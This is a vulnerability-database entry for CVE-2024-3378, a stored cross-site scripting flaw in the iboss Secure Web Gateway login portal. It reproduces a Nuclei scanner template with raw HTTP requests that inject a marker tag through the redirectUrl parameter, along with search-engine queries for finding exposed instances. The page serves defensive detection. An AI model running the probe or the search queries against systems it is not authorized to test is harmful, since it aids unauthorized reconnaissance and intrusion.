Lucene search
K

iboss Secure Web Gateway - Stored Cross-Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Stored XSS in iboss Secure Web Gateway up to v10.1 via login redirectUrl; upgrade to 10.2.0.160.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
iboss Secure Web Gateway - Stored Cross-Site Scripting Vulnerability
8 May 202400:00
zdt
Circl
CVE-2024-3378
16 Sep 202520:55
circl
CNNVD
iboss Secure Web Gateway 跨站脚本漏洞
6 Apr 202400:00
cnnvd
CVE
CVE-2024-3378
6 Apr 202412:31
cve
Cvelist
CVE-2024-3378 iboss Secure Web Gateway Login Portal login cross site scripting
6 Apr 202412:31
cvelist
Exploit DB
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
8 May 202400:00
exploitdb
EUVD
EUVD-2024-31967
3 Oct 202520:07
euvd
NVD
CVE-2024-3378
6 Apr 202413:15
nvd
OSV
CVE-2024-3378
6 Apr 202413:15
osv
Packet Storm
iboss Secure Web Gateway Cross Site Scripting
9 May 202400:00
packetstorm
Rows per page
id: CVE-2024-3378

info:
  name: iboss Secure Web Gateway - Stored Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    A cross-site scripting vulnerability has been found in iboss Secure Web Gateway up to version 10.1. The vulnerability affects the /login file of the Login Portal component, where manipulation of the redirectUrl parameter leads to cross-site scripting. The attack can be launched remotely and the exploit has been disclosed to the public.
  impact: |
    Attackers can inject malicious scripts via the redirectUrl parameter in the login portal.
  remediation: |
    Update iboss Secure Web Gateway to version 10.2.0.160 or later.
  reference:
    - https://www.exploit-db.com/exploits/52009
    - https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
    - https://vuldb.com/?ctiid.259501
    - https://vuldb.com/?id.259501
    - https://vuldb.com/?submit.310642
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-3378
    cwe-id: CWE-79
    epss-score: 0.0554
    epss-percentile: 0.90421
    cpe: cpe:2.3:a:iboss:secure_web_gateway:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: iboss
    product: secure_web_gateway
    shodan-query: html:"iboss-font.css"
    fofa-query: body="iboss-font.css"
    google-query: intext:"iboss-font.css"
  tags: cve,cve2024,iboss,xss,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /user_login_submit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{rand_base(10)}}&x={{rand_base(10)}}&action=login&redirectUrl=</{{randstr}}>

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Login failed")'
          - 'status_code == 302'
        condition: and
        internal: true

  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(http_2_body, "</{{randstr}}>\"") && contains(http_2_body, "iboss,")'

      - type: status
        status:
          - 200
# digest: 490a00463044022071d2bcbe629fd3ae358a679fe5f7a2ef8d0e6668ca24c210b9913964b99f4bb3022050564db7250577cba4612c658531069ec6c098f8c893d69a58f2250017db6899:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
4.8Medium risk
Vulners AI Score4.8
CVSS 3.14.3 - 6.1
CVSS 25
CVSS 34.3
EPSS0.0554
SSVC
13